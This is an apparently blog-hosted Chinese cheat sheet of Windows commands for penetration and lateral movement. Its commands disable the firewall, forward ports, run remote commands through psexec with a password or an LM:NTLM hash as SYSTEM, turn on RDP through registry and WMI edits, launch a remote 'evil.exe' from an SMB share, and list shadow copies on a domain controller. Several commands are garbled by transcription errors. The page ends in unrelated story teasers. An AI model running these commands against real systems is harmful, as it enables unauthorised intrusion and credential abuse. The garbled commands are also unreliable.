windows環(huán)境滲透中常用系統(tǒng)命令

禁用windows防火墻
netsh advfirewall set currentprofile state off
netsh adbfirewall set all profiles state off

本機(jī)windows端口轉(zhuǎn)發(fā)(必須是管理員權(quán)限)不需要借助第三方軟件進(jìn)行轉(zhuǎn)發(fā)
啟用轉(zhuǎn)發(fā)
netsh interface port proxy add v4tov4 listenport=3000 listenaddress=192.168.1.100 connectport=4000 connectaddress=192.168.1.120
停止轉(zhuǎn)發(fā)
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=192.168.1.100

psexec的一些用法

執(zhí)行遠(yuǎn)程主機(jī)上上的文件或者命令
psexec /acceptula \targetip -u domain\user -p password -c -f \smbip \share\file.exe

#注意默垄,第一次執(zhí)行psexec一定要帶aaceptula參數(shù)痹扇,否則會(huì)彈出一個(gè)確認(rèn)對(duì)話框组橄,在命令行下是沒(méi)辦法結(jié)束的

利用用戶hash來(lái)登錄遠(yuǎn)程主機(jī)并執(zhí)行命令
psexec /acceptula \ip -u Domain\user -p LM:NTLM cmd.exe /c dir c:\

以system權(quán)限來(lái)執(zhí)行遠(yuǎn)程命令
psexec /accepteula \ip -s md.exe

修改注冊(cè)表開(kāi)啟windows終端服務(wù)
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

wmi命令用法詳解

使用用戶名密碼通過(guò)smb來(lái)執(zhí)行遠(yuǎn)程主機(jī)上的命令或者文件
wmic /node: targetiP /user:domain\user /password:password process call create "\ smbiP \share\evil.exe”

卸載軟件
wmic product get name /value # 獲取軟件名稱
wmic product where name=11XXX" call uninstall /nointeractive

判定遠(yuǎn)程登錄用戶
wmic /node:remotecomputer computersystern get username

實(shí)時(shí)獲取遠(yuǎn)程主機(jī)進(jìn)程
wmic /node:machinename process list brief /every:1

開(kāi)啟遠(yuǎn)程rdp
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
AllowTSConnections=''O'' call SetAllowTSConnections ''1’'

列舉用戶登錄時(shí)長(zhǎng)
wmic netlogin where (name like "%adm%") get numberoflogons

卷影拷貝服務(wù)
wmic /node: DC IP /user:"DOI1AIN\user" /password:"P ASS 11 process call create "cmd /c vssadmin list shadows 2 &1 c:\temp\output.txt”

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市好渠,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌幻捏,老刑警劉巖宏所,帶你破解...
    沈念sama閱讀 212,884評(píng)論 6 492
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異壹堰,居然都是意外死亡拭卿,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,755評(píng)論 3 385
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門(mén)缀旁,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)记劈,“玉大人勺鸦,你說(shuō)我怎么就攤上這事并巍。” “怎么了换途?”我有些...
    開(kāi)封第一講書(shū)人閱讀 158,369評(píng)論 0 348
  • 道士緝兇錄:失蹤的賣(mài)姜人
    文/不壞的土叔 我叫張陵懊渡,是天一觀的道長(zhǎng)刽射。 經(jīng)常有香客問(wèn)我,道長(zhǎng)剃执,這世上最難降的妖魔是什么誓禁? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 56,799評(píng)論 1 285
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮肾档,結(jié)果婚禮上摹恰,老公的妹妹穿的比我還像新娘。我一直安慰自己怒见,他們只是感情好俗慈,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,910評(píng)論 6 386
  • 惡毒庶女頂嫁案:這布局不是一般人想出來(lái)的
    文/花漫 我一把揭開(kāi)白布井佑。 她就那樣靜靜地躺著懒棉,像睡著了一般拙已。 火紅的嫁衣襯著肌膚如雪席楚。 梳的紋絲不亂的頭發(fā)上拼卵,一...
    開(kāi)封第一講書(shū)人閱讀 50,096評(píng)論 1 291
  • 城市分裂傳說(shuō)
    那天苟鸯,我揣著相機(jī)與錄音豫领,去河邊找鬼栓撞。 笑死纪隙,一個(gè)胖子當(dāng)著我的面吹牛赊豌,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播绵咱,決...
    沈念sama閱讀 39,159評(píng)論 3 411
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開(kāi)眼亿絮,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了麸拄?” 一聲冷哼從身側(cè)響起派昧,我...
    開(kāi)封第一講書(shū)人閱讀 37,917評(píng)論 0 268
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎拢切,沒(méi)想到半個(gè)月后蒂萎,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,360評(píng)論 1 303
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡淮椰,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,673評(píng)論 2 327
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年五慈,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片主穗。...
    茶點(diǎn)故事閱讀 38,814評(píng)論 1 341
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡泻拦,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出忽媒,到底是詐尸還是另有隱情争拐,我是刑警寧澤,帶...
    沈念sama閱讀 34,509評(píng)論 4 334
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布晦雨,位于F島的核電站架曹,受9級(jí)特大地震影響隘冲,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜绑雄,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 40,156評(píng)論 3 317
  • 男人毒藥:我在死后第九天來(lái)索命
    文/蒙蒙 一展辞、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧万牺,春花似錦罗珍、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,882評(píng)論 0 21
  • 一樁弒父案靡砌,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至珊楼,卻和暖如春通殃,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背厕宗。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,123評(píng)論 1 267
  • 情欲美人皮
    我被黑心中介騙來(lái)泰國(guó)打工画舌, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人已慢。 一個(gè)月前我還...
    沈念sama閱讀 46,641評(píng)論 2 362
  • 代替公主和親
    正文 我出身青樓曲聂,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親佑惠。 傳聞我的和親對(duì)象是個(gè)殘疾皇子朋腋,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,728評(píng)論 2 351

推薦閱讀更多精彩內(nèi)容

  • 部分內(nèi)容轉(zhuǎn)載自搜狗百科 cmd是command的縮寫(xiě).即命令提示符(CMD),是在OS / 2 膜楷, Windows...
    青冥之上閱讀 2,388評(píng)論 0 24
  • 黑客常用命令大全 net user heibai lovechina /add 加一個(gè)heibai的用戶密碼...
    倒帶默寫(xiě)閱讀 16,804評(píng)論 0 24
  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理旭咽,服務(wù)發(fā)現(xiàn),斷路器赌厅,智...
    卡卡羅2017閱讀 134,638評(píng)論 18 139
  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,168評(píng)論 0 11
  • 轉(zhuǎn)自:http://www.freebuf.com/sectool/105524.html 本文為作者總結(jié)自己在滲...
    許安念安閱讀 5,433評(píng)論 0 10